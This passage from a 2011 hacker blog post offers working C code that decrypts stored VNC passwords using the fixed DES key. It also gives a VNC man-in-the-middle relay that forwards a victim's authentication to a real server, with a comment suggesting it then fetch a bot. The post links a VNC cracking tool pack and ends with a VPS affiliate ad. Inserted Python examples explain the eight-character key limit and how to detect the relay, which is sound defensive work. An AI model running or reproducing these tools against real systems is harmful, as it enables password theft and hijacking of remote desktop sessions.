        $sock->close;
    }
}

sub log {
    my ($self, $msg) = @_;
    my $sock = $self->sock;
    my $addr = $sock ? $sock->peerhost : '';
    print "[$addr] $msg\n";
}

And now the best thing I think you might wanna play with…. is decrypting the better VNCs ;)

Some .c code here I moved into the download pack also, so you can, like, fix it :P

/* VNC password decoder */
/* tested on Linux */
/* I take no credit */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/stat.h>

#define MAXPWLEN 8                       //---> haha w00ps we forgot to make auth only on the first 8 digits!
#define CHALLENGESIZE 16
#define EN0     0       /* MODE == encrypt */
#define DE1     1       /* MODE == decrypt */

extern int vncEncryptPasswd(char *passwd, char *fname);
extern char *vncDecryptPasswd(char *fname);
extern void vncRandomBytes(unsigned char *bytes);
extern void vncEncryptBytes(unsigned char *bytes, const char *passwd);
extern void deskey(unsigned char *, int);
extern void usekey(unsigned long *);
extern void cpkey(unsigned long *);
extern void des(unsigned char *, unsigned char *);   // yea,ya want the d3des/rfb.h..or ya will never get this..

unsigned char fixedkey[8] = {23,82,107,6,35,78,88,7};   // and the char [8] fixed-key for all auths :)
                                                        // proof that the bug exists 100% -xd

int main (void) {
/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};   // change this..if you want to, if you know wtf ur doin -xd

printf("%8s\n",vncDecryptPasswd(p));
return 0;
}

char *vncDecryptPasswd(char *inouttext) {
    unsigned char *passwd = (unsigned char *)malloc(9);
    deskey(fixedkey, DE1);
    des(inouttext, passwd);
    passwd[8] = 0;     //ohno...well look here...it only checks 8 password length afterall - passwd[8] = 0; -xd
    return (char *)passwd;
}

static void scrunch(unsigned char *, unsigned long *);
static void unscrun(unsigned long *, unsigned char *);
static void desfunc(unsigned long *, unsigned long *);
static void cookey(unsigned long *);

static unsigned long KnL[32] = { 0L };
static unsigned long KnR[32] = { 0L };
static unsigned long Kn3[32] = { 0L };
static unsigned char Df_Key[24] = {
	0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef,
	0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10,
	0x89,0xab,0xcd,0xef,0x01,0x23,0x45,0x67 };

static unsigned short bytebit[8]	= { 01, 02, 04, 010, 020, 040, 0100, 0200 };

static unsigned long bigbyte[24] = {
	0x800000L,	0x400000L,	0x200000L,	0x100000L,
	0x80000L,	0x40000L,	0x20000L,	0x10000L,
	0x8000L,	0x4000L,	0x2000L,	0x1000L,
	0x800L, 	0x400L, 	0x200L, 	0x100L,
	0x80L,		0x40L,		0x20L,		0x10L,
	0x8L,		0x4L,		0x2L,		0x1L	};

/* Use the key schedule specified in the Standard (ANSI X3.92-1981). */
static unsigned char pc1[56] = {
	56, 48, 40, 32, 24, 16,  8,	 0, 57, 49, 41, 33, 25, 17,
	 9,  1, 58, 50, 42, 34, 26,	18, 10,  2, 59, 51, 43, 35,
	62, 54, 46, 38, 30, 22, 14,	 6, 61, 53, 45, 37, 29, 21,
	13,  5, 60, 52, 44, 36, 28,	20, 12,  4, 27, 19, 11,  3 };

static unsigned char totrot[16] = {
	1,2,4,6,8,10,12,14,15,17,19,21,23,25,27,28 };

static unsigned char pc2[48] = {
	13, 16, 10, 23,  0,  4,  2, 27, 14,  5, 20,  9,
	22, 18, 11,  3, 25,  7, 15,  6, 26, 19, 12,  1,
	40, 51, 30, 36, 46, 54, 29, 39, 50, 44, 32, 47,
	43, 48, 38, 55, 33, 52, 45, 41, 49, 35, 28, 31 };

void deskey(key, edf)
unsigned char *key;
int edf;
{
	register int i, j, l, m, n;
	unsigned char pc1m[56], pcr[56];
	unsigned long kn[32];
	for ( j = 0; j < 56; j++ ) {
		l = pc1[j];
		m = l & 07;
		pc1m[j] = (key[l >> 3] & bytebit[m]) ? 1 : 0;
		}
	for( i = 0; i < 16; i++ ) {
		if( edf == DE1 ) m = (15 - i) << 1;
		else m = i << 1;
		n = m + 1;
		kn[m] = kn[n] = 0L;
		for( j = 0; j < 28; j++ ) {
			l = j + totrot[i];
			if( l < 28 ) pcr[j] = pc1m[l];
			else pcr[j] = pc1m[l - 28];
			}
		for( j = 28; j < 56; j++ ) {
		    l = j + totrot[i];
		    if( l < 56 ) pcr[j] = pc1m[l];
		    else pcr[j] = pc1m[l - 28];
		    }
		for( j = 0; j < 24; j++ ) {
			if( pcr[pc2[j]] ) kn[m] |= bigbyte[j];
			if( pcr[pc2[j+24]] ) kn[n] |= bigbyte[j];
			}
		}
	cookey(kn);
	return;
	}

static void cookey(raw1)
register unsigned long *raw1;
{
	register unsigned long *cook, *raw0;
	unsigned long dough[32];
	register int i;
	cook = dough;
	for( i = 0; i < 16; i++, raw1++ ) {
		raw0 = raw1++;
		*cook	 = (*raw0 & 0x00fc0000L) << 6;
		*cook	|= (*raw0 & 0x00000fc0L) << 10;
		*cook	|= (*raw1 & 0x00fc0000L) >> 10;
		*cook++ |= (*raw1 & 0x00000fc0L) >> 6;
		*cook	 = (*raw0 & 0x0003f000L) << 12;
		*cook	|= (*raw0 & 0x0000003fL) << 16;
		*cook	|= (*raw1 & 0x0003f000L) >> 4;
		*cook++ |= (*raw1 & 0x0000003fL);
		}
	usekey(dough);
	return;
	}

void cpkey(into)
register unsigned long *into;
{
	register unsigned long *from, *endp;
	from = KnL, endp = &KnL[32];
	while( from < endp ) *into++ = *from++;
	return;
	}

void usekey(from)
register unsigned long *from;
{
	register unsigned long *to, *endp;
	to = KnL, endp = &KnL[32];
	while( to < endp ) *to++ = *from++;
	return;
	}

void des(inblock, outblock)
unsigned char *inblock, *outblock;
{
	unsigned long work[2];
	scrunch(inblock, work);
	desfunc(work, KnL);
	unscrun(work, outblock);
	return;
	}

static void scrunch(outof, into)
register unsigned char *outof;
register unsigned long *into;
{
	*into	 = (*outof++ & 0xffL) << 24;
	*into	|= (*outof++ & 0xffL) << 16;
	*into	|= (*outof++ & 0xffL) << 8;
	*into++ |= (*outof++ & 0xffL);
	*into	 = (*outof++ & 0xffL) << 24;
	*into	|= (*outof++ & 0xffL) << 16;
	*into	|= (*outof++ & 0xffL) << 8;
	*into	|= (*outof   & 0xffL);
	return;
	}

static void unscrun(outof, into)
register unsigned long *outof;
register unsigned char *into;
{
	*into++ = (*outof >> 24) & 0xffL;
	*into++ = (*outof >> 16) & 0xffL;
	*into++ = (*outof >>  8) & 0xffL;
	*into++ =  *outof++	 & 0xffL;
	*into++ = (*outof >> 24) & 0xffL;
	*into++ = (*outof >> 16) & 0xffL;
	*into++ = (*outof >>  8) & 0xffL;
	*into	=  *outof	 & 0xffL;
	return;
	}

static unsigned long SP1[64] = {
	0x01010400L, 0x00000000L, 0x00010000L, 0x01010404L,
	0x01010004L, 0x00010404L, 0x00000004L, 0x00010000L,
	0x00000400L, 0x01010400L, 0x01010404L, 0x00000400L,
	0x01000404L, 0x01010004L, 0x01000000L, 0x00000004L,
	0x00000404L, 0x01000400L, 0x01000400L, 0x00010400L,
	0x00010400L, 0x01010000L, 0x01010000L, 0x01000404L,
	0x00010004L, 0x01000004L, 0x01000004L, 0x00010004L,
	0x00000000L, 0x00000404L, 0x00010404L, 0x01000000L,
	0x00010000L, 0x01010404L, 0x00000004L, 0x01010000L,
	0x01010400L, 0x01000000L, 0x01000000L, 0x00000400L,
	0x01010004L, 0x00010000L, 0x00010400L, 0x01000004L,
	0x00000400L, 0x00000004L, 0x01000404L, 0x00010404L,
	0x01010404L, 0x00010004L, 0x01010000L, 0x01000404L,
	0x01000004L, 0x00000404L, 0x00010404L, 0x01010400L,
	0x00000404L, 0x01000400L, 0x01000400L, 0x00000000L,
	0x00010004L, 0x00010400L, 0x00000000L, 0x01010004L };

static unsigned long SP2[64] = {
	0x80108020L, 0x80008000L, 0x00008000L, 0x00108020L,
	0x00100000L, 0x00000020L, 0x80100020L, 0x80008020L,
	0x80000020L, 0x80108020L, 0x80108000L, 0x80000000L,
	0x80008000L, 0x00100000L, 0x00000020L, 0x80100020L,
	0x00108000L, 0x00100020L, 0x80008020L, 0x00000000L,
	0x80000000L, 0x00008000L, 0x00108020L, 0x80100000L,
	0x00100020L, 0x80000020L, 0x00000000L, 0x00108000L,
	0x00008020L, 0x80108000L, 0x80100000L, 0x00008020L,
	0x00000000L, 0x00108020L, 0x80100020L, 0x00100000L,
	0x80008020L, 0x80100000L, 0x80108000L, 0x00008000L,
	0x80100000L, 0x80008000L, 0x00000020L, 0x80108020L,
	0x00108020L, 0x00000020L, 0x00008000L, 0x80000000L,
	0x00008020L, 0x80108000L, 0x00100000L, 0x80000020L,
	0x00100020L, 0x80008020L, 0x80000020L, 0x00100020L,
	0x00108000L, 0x00000000L, 0x80008000L, 0x00008020L,
	0x80000000L, 0x80100020L, 0x80108020L, 0x00108000L };

static unsigned long SP3[64] = {
	0x00000208L, 0x08020200L, 0x00000000L, 0x08020008L,
	0x08000200L, 0x00000000L, 0x00020208L, 0x08000200L,
	0x00020008L, 0x08000008L, 0x08000008L, 0x00020000L,
	0x08020208L, 0x00020008L, 0x08020000L, 0x00000208L,
	0x08000000L, 0x00000008L, 0x08020200L, 0x00000200L,
	0x00020200L, 0x08020000L, 0x08020008L, 0x00020208L,
	0x08000208L, 0x00020200L, 0x00020000L, 0x08000208L,
	0x00000008L, 0x08020208L, 0x00000200L, 0x08000000L,
	0x08020200L, 0x08000000L, 0x00020008L, 0x00000208L,
	0x00020000L, 0x08020200L, 0x08000200L, 0x00000000L,
	0x00000200L, 0x00020008L, 0x08020208L, 0x08000200L,
	0x08000008L, 0x00000200L, 0x00000000L, 0x08020008L,
	0x08000208L, 0x00020000L, 0x08000000L, 0x08020208L,
	0x00000008L, 0x00020208L, 0x00020200L, 0x08000008L,
	0x08020000L, 0x08000208L, 0x00000208L, 0x08020000L,
	0x00020208L, 0x00000008L, 0x08020008L, 0x00020200L };

static unsigned long SP4[64] = {
	0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L,
	0x00802080L, 0x00800081L, 0x00800001L, 0x00002001L,
	0x00000000L, 0x00802000L, 0x00802000L, 0x00802081L,
	0x00000081L, 0x00000000L, 0x00800080L, 0x00800001L,
	0x00000001L, 0x00002000L, 0x00800000L, 0x00802001L,
	0x00000080L, 0x00800000L, 0x00002001L, 0x00002080L,
	0x00800081L, 0x00000001L, 0x00002080L, 0x00800080L,
	0x00002000L, 0x00802080L, 0x00802081L, 0x00000081L,
	0x00800080L, 0x00800001L, 0x00802000L, 0x00802081L,
	0x00000081L, 0x00000000L, 0x00000000L, 0x00802000L,
	0x00002080L, 0x00800080L, 0x00800081L, 0x00000001L,
	0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L,
	0x00802081L, 0x00000081L, 0x00000001L, 0x00002000L,
	0x00800001L, 0x00002001L, 0x00802080L, 0x00800081L,
	0x00002001L, 0x00002080L, 0x00800000L, 0x00802001L,
	0x00000080L, 0x00800000L, 0x00002000L, 0x00802080L };

static unsigned long SP5[64] = {
	0x00000100L, 0x02080100L, 0x02080000L, 0x42000100L,
	0x00080000L, 0x00000100L, 0x40000000L, 0x02080000L,
	0x40080100L, 0x00080000L, 0x02000100L, 0x40080100L,
	0x42000100L, 0x42080000L, 0x00080100L, 0x40000000L,
	0x02000000L, 0x40080000L, 0x40080000L, 0x00000000L,
	0x40000100L, 0x42080100L, 0x42080100L, 0x02000100L,
	0x42080000L, 0x40000100L, 0x00000000L, 0x42000000L,
	0x02080100L, 0x02000000L, 0x42000000L, 0x00080100L,
	0x00080000L, 0x42000100L, 0x00000100L, 0x02000000L,
	0x40000000L, 0x02080000L, 0x42000100L, 0x40080100L,
	0x02000100L, 0x40000000L, 0x42080000L, 0x02080100L,
	0x40080100L, 0x00000100L, 0x02000000L, 0x42080000L,
	0x42080100L, 0x00080100L, 0x42000000L, 0x42080100L,
	0x02080000L, 0x00000000L, 0x40080000L, 0x42000000L,
	0x00080100L, 0x02000100L, 0x40000100L, 0x00080000L,
	0x00000000L, 0x40080000L, 0x02080100L, 0x40000100L };

static unsigned long SP6[64] = {
	0x20000010L, 0x20400000L, 0x00004000L, 0x20404010L,
	0x20400000L, 0x00000010L, 0x20404010L, 0x00400000L,
	0x20004000L, 0x00404010L, 0x00400000L, 0x20000010L,
	0x00400010L, 0x20004000L, 0x20000000L, 0x00004010L,
	0x00000000L, 0x00400010L, 0x20004010L, 0x00004000L,
	0x00404000L, 0x20004010L, 0x00000010L, 0x20400010L,
	0x20400010L, 0x00000000L, 0x00404010L, 0x20404000L,
	0x00004010L, 0x00404000L, 0x20404000L, 0x20000000L,
	0x20004000L, 0x00000010L, 0x20400010L, 0x00404000L,
	0x20404010L, 0x00400000L, 0x00004010L, 0x20000010L,
	0x00400000L, 0x20004000L, 0x20000000L, 0x00004010L,
	0x20000010L, 0x20404010L, 0x00404000L, 0x20400000L,
	0x00404010L, 0x20404000L, 0x00000000L, 0x20400010L,
	0x00000010L, 0x00004000L, 0x20400000L, 0x00404010L,
	0x00004000L, 0x00400010L, 0x20004010L, 0x00000000L,
	0x20404000L, 0x20000000L, 0x00400010L, 0x20004010L };

static unsigned long SP7[64] = {
	0x00200000L, 0x04200002L, 0x04000802L, 0x00000000L,
	0x00000800L, 0x04000802L, 0x00200802L, 0x04200800L,
	0x04200802L, 0x00200000L, 0x00000000L, 0x04000002L,
	0x00000002L, 0x04000000L, 0x04200002L, 0x00000802L,
	0x04000800L, 0x00200802L, 0x00200002L, 0x04000800L,
	0x04000002L, 0x04200000L, 0x04200800L, 0x00200002L,
	0x04200000L, 0x00000800L, 0x00000802L, 0x04200802L,
	0x00200800L, 0x00000002L, 0x04000000L, 0x00200800L,
	0x04000000L, 0x00200800L, 0x00200000L, 0x04000802L,
	0x04000802L, 0x04200002L, 0x04200002L, 0x00000002L,
	0x00200002L, 0x04000000L, 0x04000800L, 0x00200000L,
	0x04200800L, 0x00000802L, 0x00200802L, 0x04200800L,
	0x00000802L, 0x04000002L, 0x04200802L, 0x04200000L,
	0x00200800L, 0x00000000L, 0x00000002L, 0x04200802L,
	0x00000000L, 0x00200802L, 0x04200000L, 0x00000800L,
	0x04000002L, 0x04000800L, 0x00000800L, 0x00200002L };

static unsigned long SP8[64] = {
	0x10001040L, 0x00001000L, 0x00040000L, 0x10041040L,
	0x10000000L, 0x10001040L, 0x00000040L, 0x10000000L,
	0x00040040L, 0x10040000L, 0x10041040L, 0x00041000L,
	0x10041000L, 0x00041040L, 0x00001000L, 0x00000040L,
	0x10040000L, 0x10000040L, 0x10001000L, 0x00001040L,
	0x00041000L, 0x00040040L, 0x10040040L, 0x10041000L,
	0x00001040L, 0x00000000L, 0x00000000L, 0x10040040L,
	0x10000040L, 0x10001000L, 0x00041040L, 0x00040000L,
	0x00041040L, 0x00040000L, 0x10041000L, 0x00001000L,
	0x00000040L, 0x10040040L, 0x00001000L, 0x00041040L,
	0x10001000L, 0x00000040L, 0x10000040L, 0x10040000L,
	0x10040040L, 0x10000000L, 0x00040000L, 0x10001040L,
	0x00000000L, 0x10041040L, 0x00040040L, 0x10000040L,
	0x10040000L, 0x10001000L, 0x10001040L, 0x00000000L,
	0x10041040L, 0x00041000L, 0x00041000L, 0x00001040L,
	0x00001040L, 0x00040040L, 0x10000000L, 0x10041000L };

static void desfunc(block, keys)
register unsigned long *block, *keys;
{
	register unsigned long fval, work, right, leftt;
	register int round;
	leftt = block[0];
	right = block[1];
	work = ((leftt >> 4) ^ right) & 0x0f0f0f0fL;
	right ^= work;
	leftt ^= (work << 4);
	work = ((leftt >> 16) ^ right) & 0x0000ffffL;
	right ^= work;
	leftt ^= (work << 16);
	work = ((right >> 2) ^ leftt) & 0x33333333L;
	leftt ^= work;
	right ^= (work << 2);
	work = ((right >> 8) ^ leftt) & 0x00ff00ffL;
	leftt ^= work;
	right ^= (work << 8);
	right = ((right << 1) | ((right >> 31) & 1L)) & 0xffffffffL;
	work = (leftt ^ right) & 0xaaaaaaaaL;
	leftt ^= work;
	right ^= work;
	leftt = ((leftt << 1) | ((leftt>>31) & 1L)) & 0xffffffffL;
	for( round = 0; round < 8; round++ ) {
		work  = (right<<28) | (right>>4);
		work ^= *keys++;
		fval  = SP7[ work & 0x3fL];
		fval |= SP5[(work>>8) & 0x3fL];
		fval |= SP3[(work>>16) & 0x3fL];
		fval |= SP1[(work>>24) & 0x3fL];
		work  = right ^ *keys++;
		fval |= SP8[ work & 0x3fL];
		fval |= SP6[(work>>8) & 0x3fL];
		fval |= SP4[(work>>16) & 0x3fL];
		fval |= SP2[(work>>24) & 0x3fL];
		leftt ^= fval;
		work  = (leftt << 28) | (leftt>>4);
		work ^= *keys++;
		fval  = SP7[ work & 0x3fL];
		fval |= SP5[(work >>  8) & 0x3fL];
		fval |= SP3[(work >> 16) & 0x3fL];
		fval |= SP1[(work >> 24) & 0x3fL];
		work  = leftt ^ *keys++;
		fval |= SP8[ work & 0x3fL];
		fval |= SP6[(work >>  8) & 0x3fL];
		fval |= SP4[(work >> 16) & 0x3fL];
		fval |= SP2[(work >> 24) & 0x3fL];
		right ^= fval;
		}
	right = (right << 31) | (right >> 1);
	work = (leftt ^ right) & 0xaaaaaaaaL;
	leftt ^= work;
	right ^= work;
	leftt = (leftt << 31) | (leftt >> 1);
	work = ((leftt >> 8) ^ right) & 0x00ff00ffL;
	right ^= work;
	leftt ^= (work << 8);
	work = ((leftt >> 2) ^ right) & 0x33333333L;
	right ^= work;
	leftt ^= (work << 2);
	work = ((right >> 16) ^ leftt) & 0x0000ffffL;
	leftt ^= work;
	right ^= (work << 16);
	work = ((right >> 4) ^ leftt) & 0x0f0f0f0fL;
	leftt ^= work;
	right ^= (work << 4);
	*block++ = right;
	*block = leftt;
	return;
	}
[/code]

hehe, that's basically how a standard decryptor works. So, spot that 8-digit bug yet?? lol... believe me, use it!
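Added example, not code from the original post: this shows what the RFB "VNC Authentication" key derivation does to a password before DES ever runs, and why only the first eight characters matter (the 8-digit issue the post alludes to). It assumes the derivation in RFC 6143 section 7.2.2 (truncate to eight bytes or right-pad with NULs) plus the per-byte bit reversal implied by the d3des listing above: its bytebit table reads {01, 02, 04, ...} where Outerbridge's original reads {0200, 0100, 040, ...}, which has the same effect as reversing the bits of each key byte before a standard DES. The function names and the policy-audit helper are mine; it is written in Python because it is an audit check, not cipher code.

```python
# Added example (not code from the original post): RFB VNC Authentication key
# derivation, as a password-policy audit. Assumptions: RFC 6143 7.2.2 (truncate
# or NUL-pad to 8 bytes) and the per-byte bit reversal of VNC's modified d3des.

KEY_LEN = 8  # DES takes a 64-bit key; RFB feeds it the raw password bytes


def reverse_bits(byte: int) -> int:
    """Reverse the eight bits of one byte (0b10000000 -> 0b00000001)."""
    return int(f"{byte:08b}"[::-1], 2)


def vnc_des_key(password: str) -> bytes:
    """Derive the 8-byte DES key that VNC Authentication uses for a password.

    Steps, as VNC clients perform them:
      1. encode the password (ASCII/Latin-1 in practice),
      2. truncate to 8 bytes, or right-pad with NULs,
      3. reverse the bits of every byte (modified-d3des quirk).
    """
    raw = password.encode("latin-1")[:KEY_LEN]
    raw = raw.ljust(KEY_LEN, b"\x00")
    return bytes(reverse_bits(b) for b in raw)


def effective_password(password: str) -> str:
    """The part of a password that actually influences the DES key."""
    return password[:KEY_LEN]


def audit_password_policy(min_length: int) -> dict:
    """Report how much of a minimum-length policy VNC Authentication honours.

    Anything the policy demands beyond position 8 never reaches the cipher,
    so a 14-character requirement buys exactly as much as an 8-character one.
    """
    honoured = min(min_length, KEY_LEN)
    return {
        "policy_min_length": min_length,
        "characters_used_by_vnc_auth": honoured,
        "characters_ignored": max(0, min_length - KEY_LEN),
        "policy_is_illusory_beyond_8": min_length > KEY_LEN,
    }


if __name__ == "__main__":
    # Constructed sample passwords: the first two share their first 8 characters
    # and therefore produce an identical DES key.
    for pw in ("correcthorsebatterystaple", "correcthorse", "correct"):
        print(f"{pw!r:30} -> key {vnc_des_key(pw).hex()}  "
              f"(effective {effective_password(pw)!r})")
    print(audit_password_policy(14))
```

The practical consequence for a defender is that VNC Authentication on its own caps the password space at eight bytes regardless of policy; the fix is to put RFB behind SSH, a VPN, or VeNCrypt/TLS rather than to lengthen the password.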

Now... one more piece of code, and that's IT! THIS is a different method: a VNC MiTM attack! yea bitches... watch out!

[code]
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

#define VNCPORT 5900
#define VNCSERVER "x.x.x.x"  // enter ya fakey here :P  this only is for, making it exec,
                             // look at bottom where it shows how todo this..
#define QUEUE 8
#define RELAYBUF 512         /* was BUFSIZ, which clashes with the macro <stdio.h> defines */

typedef char rfbProtocolVersionMsg[13];
#define sz_rfbProtocolVersionMsg 12

int main (int argc, char **argv) {
	int sockfd, clientfd, vncfd;
	ssize_t nbytes = 0;
	struct sockaddr_in server, client, vnc;
	socklen_t len = sizeof (client);
	char buf [RELAYBUF + 1];	/* one spare byte so buf[nbytes] = 0 stays in bounds */

	if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
		perror ("socket");
		exit (-1);
	}
	memset (&server, 0, sizeof (server));
	server.sin_family = AF_INET;
	server.sin_addr.s_addr = htonl (INADDR_ANY);
	server.sin_port = htons (VNCPORT);
	/* this is the fake VNC server */
	if (bind (sockfd, (struct sockaddr *) &server, sizeof (server)) == -1) {
		perror ("bind");
		exit (-1);
	}
	listen (sockfd, QUEUE);
	if ((clientfd = accept (sockfd, (struct sockaddr *) &client, &len)) == -1) {
		perror ("accept");
		exit (-1);
	}
	strcpy (buf, "RFB 003.003\n");
	/* we must send the VNC version number (from the protocol) */
	if (write (clientfd, buf, strlen (buf)) < (ssize_t) strlen (buf)) {
		perror ("write");
		exit (-1);
	}
	/* we also must read the client's VNC version number (from the protocol) */
	if ((nbytes = read (clientfd, buf, RELAYBUF)) <= 0) {
		perror ("read");
		exit (-1);
	}
	buf [nbytes] = 0;
	printf ("[VNC Version] -> %s\n", buf);
	/* RFB 3.3 security type as a 4-byte big-endian word: 2 = VNC Authentication */
	buf [0] = 0x00;
	buf [1] = 0x00;
	buf [2] = 0x00;
	buf [3] = 0x02;
	/* we send the authentication method code to the client */
	if (write (clientfd, buf, 4) < 4) {
		perror ("write");
		exit (-1);
	}
	if ((vncfd = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
		perror ("socket");
		exit (-1);
	}
	memset (&vnc, 0, sizeof (vnc));
	vnc.sin_family = AF_INET;
	vnc.sin_addr.s_addr = inet_addr (VNCSERVER);
	vnc.sin_port = htons (VNCPORT);
	/* we connect to the real VNC server */
	if (connect (vncfd, (struct sockaddr *) &vnc, sizeof (vnc)) == -1) {
		perror ("connect");
		exit (-1);
	}
	/* again, we read the version number from the VNC server */
	if ((nbytes = read (vncfd, buf, RELAYBUF)) <= 0) {
		perror ("read");
		exit (-1);
	}
	strcpy (buf, "RFB 003.003\n");
	/* and we send ours */
	if (write (vncfd, buf, strlen (buf)) < (ssize_t) strlen (buf)) {
		perror ("write");
		exit (-1);
	}
	/* we now read the auth method code from the VNC server */
	if ((nbytes = read (vncfd, buf, RELAYBUF)) <= 0) {
		perror ("read");
		exit (-1);
	}
	/* here is the 16-byte challenge from the server */
	if ((nbytes = read (vncfd, buf, RELAYBUF)) <= 0) {
		perror ("read");
		exit (-1);
	}
	/* we send the challenge to the victim client */
	if (write (clientfd, buf, 16) < 16) {
		perror ("write");
		exit (-1);
	}
	/* we have the encrypted pass (the 16-byte DES response) from the client */
	if ((nbytes = read (clientfd, buf, RELAYBUF)) <= 0) {
		perror ("read");
		exit (-1);
	}
	/* we send the encrypted pass to the VNC server */
	if (write (vncfd, buf, 16) < 16) {
		perror ("write");
		exit (-1);
	}
	/* we read the 4-byte result of the auth process */
	if (read (vncfd, buf, RELAYBUF) < 4) {
		perror ("read");
		exit (-1);
	}
	/* at this point we should be authd */
	/* place whatever code you want here ex: ftp cmd to wget your bot... */
	close (clientfd);
	close (sockfd);
	close (vncfd);
	return 0;
}
[/code]

Nice one eh... hehe. Now imagine making people log on and showing them a fake-looking VNC, but in fact it is a MiTM :P I have kept this one hidden until, I guess, I got sick of being alone :P
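Added example, not code from the original post: a parser for the RFB security handshake over both directions of a captured TCP stream, covering the 3.3 form the relay above forces on both sides (one 4-byte security type) and the 3.7/3.8 form (a list of types and the client's one-byte choice), with the findings a monitoring rule would raise. The byte strings are constructed for the example, the challenge and response are filler rather than DES output, and the class and function names are mine.

```python
# Added example (not code from the original post): RFB security-handshake parser
# with defender findings. Message layouts follow RFC 6143 sections 7.1.1-7.2.2.
import struct
from dataclasses import dataclass, field
from typing import List, Optional

SEC_TYPE_NAMES = {0: "Invalid", 1: "None", 2: "VNC Authentication", 18: "TLS", 19: "VeNCrypt"}
CHALLENGE_SIZE = 16  # VNC Authentication challenge and response are both 16 bytes


@dataclass
class RfbHandshake:
    server_version: str
    client_version: str
    offered_types: List[int]
    chosen_type: Optional[int]
    challenge: Optional[bytes] = None
    response: Optional[bytes] = None
    auth_result: Optional[int] = None
    findings: List[str] = field(default_factory=list)


class _Stream:
    """Sequential reader over one direction of a reassembled TCP stream."""

    def __init__(self, data: bytes):
        self.data, self.pos = data, 0

    def take(self, n: int) -> bytes:
        if self.pos + n > len(self.data):
            raise ValueError(f"stream truncated: wanted {n} bytes at offset {self.pos}")
        chunk = self.data[self.pos:self.pos + n]
        self.pos += n
        return chunk


def _version(raw: bytes) -> str:
    """Decode the fixed 12-byte ProtocolVersion message 'RFB xxx.yyy\\n'."""
    if len(raw) != 12 or not raw.startswith(b"RFB ") or raw[-1:] != b"\n":
        raise ValueError(f"not an RFB ProtocolVersion message: {raw!r}")
    return raw[4:11].decode("ascii")


def parse_rfb_handshake(server_to_client: bytes, client_to_server: bytes) -> RfbHandshake:
    """Walk both directions of the RFB security handshake and collect findings."""
    s2c, c2s = _Stream(server_to_client), _Stream(client_to_server)
    sv, cv = _version(s2c.take(12)), _version(c2s.take(12))
    major, minor = (int(x) for x in cv.split("."))  # the client's reply fixes the version in use
    legacy = (major, minor) <= (3, 3)

    if legacy:
        # 3.3: the server dictates a single security type as a 4-byte big-endian word
        offered = [struct.unpack(">I", s2c.take(4))[0]]
        chosen = offered[0]
    else:
        # 3.7 / 3.8: server sends a 1-byte count plus the list, client answers with one byte
        count = s2c.take(1)[0]
        offered = list(s2c.take(count))
        chosen = c2s.take(1)[0] if count else None

    hs = RfbHandshake(sv, cv, offered, chosen)
    if legacy:
        hs.findings.append("RFB 3.3 negotiated: the server names one security type, so the client can "
                           "never select TLS/VeNCrypt, and a relay forcing 3.3 on both sides is "
                           "indistinguishable from a real 3.3 server")
    if chosen == 1:
        hs.findings.append("security type None: no authentication at all")
    if chosen == 2:
        hs.challenge = s2c.take(CHALLENGE_SIZE)
        hs.response = c2s.take(CHALLENGE_SIZE)
        hs.auth_result = struct.unpack(">I", s2c.take(4))[0]
        hs.findings.append("VNC Authentication in cleartext: the 16-byte DES response depends only on "
                           "the challenge and the password, not on who sent the challenge, so an "
                           "on-path relay can forward it unchanged; tunnel RFB over SSH/VPN or require "
                           "VeNCrypt/TLS and keep 5900 off untrusted networks")
        hs.findings.append("authentication " + ("succeeded" if hs.auth_result == 0 else "failed"))
    return hs


# Constructed capture of the exchange the relay above produces: both sides at
# 3.3, security type 2, filler challenge/response, SecurityResult 0 (OK).
SAMPLE_CHALLENGE = bytes(range(0x10, 0x20))
SAMPLE_RESPONSE = bytes.fromhex("deadbeef" * 4)
SAMPLE_S2C = b"RFB 003.003\n" + struct.pack(">I", 2) + SAMPLE_CHALLENGE + struct.pack(">I", 0)
SAMPLE_C2S = b"RFB 003.003\n" + SAMPLE_RESPONSE

if __name__ == "__main__":
    hs = parse_rfb_handshake(SAMPLE_S2C, SAMPLE_C2S)
    print(f"RFB {hs.client_version}, security type "
          f"{SEC_TYPE_NAMES.get(hs.chosen_type, hs.chosen_type)}")
    for finding in hs.findings:
        print(" -", finding)
```

The detection angle worth keeping from this: a server you know speaks 3.8 suddenly announcing "RFB 003.003" to clients, or security type 2 appearing on a segment where only VeNCrypt/TLS or tunnelled RFB is expected, is exactly the footprint the relay above leaves.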
Now... what else is handy for VNC?

Try grabbing this; it might be more useful, but remember the best exploit, which has no CVE... yet I just posted it :) The no.1 8-digit bypass is the best!
This pack is only tools... not all mine, and not MY viewer, but I could add the viewer if requested personally, only on my IRC channel #haxnet on EFnet!
xd!
-> http://hotfile.com/dl/136984708/855b1ef/VNC.Cracking-ALL.rar.html

ALSO look for VNCsnapshot, and also its author, or maybe a member of the team, who actually made a MOD of it which works exactly with MY bots' listing :P so it is c00l :)
Anyhow, this is enough for now...

VPS Hosting at 9.95 a/mo, VERY nice setups! Use AFF Link to get better deals/support!

Posted on 26th November 2011 in Android, Codes, Exploits, Papers, Uncategorized

SIGNUP HERE -> http://www.vr.org/aff.php?aff=551

Just to point out an awesome VPS hosting place, where I currently have 2 boxes, and who have the BEST customer support I have ever found!
The company is HostVirtual, an 11-location company, with datacenters opening now in Asia on super-fast fiber lines.
Folks, this company is going places.. Also hosting warchall.net, and MANY other sites/shells!
They cater for all, have awesome service, and it is CLOUDS: you get what you pay for. They cannot cheat, because xen-cloud limits usage accordingly… where openvz does not. This is why, when you're looking at your next OpenVZ box, check how much RAM and burstable RAM you get.. then check even… you will be shocked :>
This company's boxes are all Xeon QuadCore high-end side of town stuff, awesome high-speed blades, all with extra fine DDoS protection!

Please use the AFFILIATE link http://www.vr.org/aff.php?aff=551 , and then you can use the hand of god to summon xd– on Efnet for support, or simply submit a ticket!

These boxes are worth it.. initial signup is only 4.31!
Existing customers get 10% off each ‘instance’, which is about 8bux for making another VPS… very handy :)

http://www.vr.org/aff.php?aff=551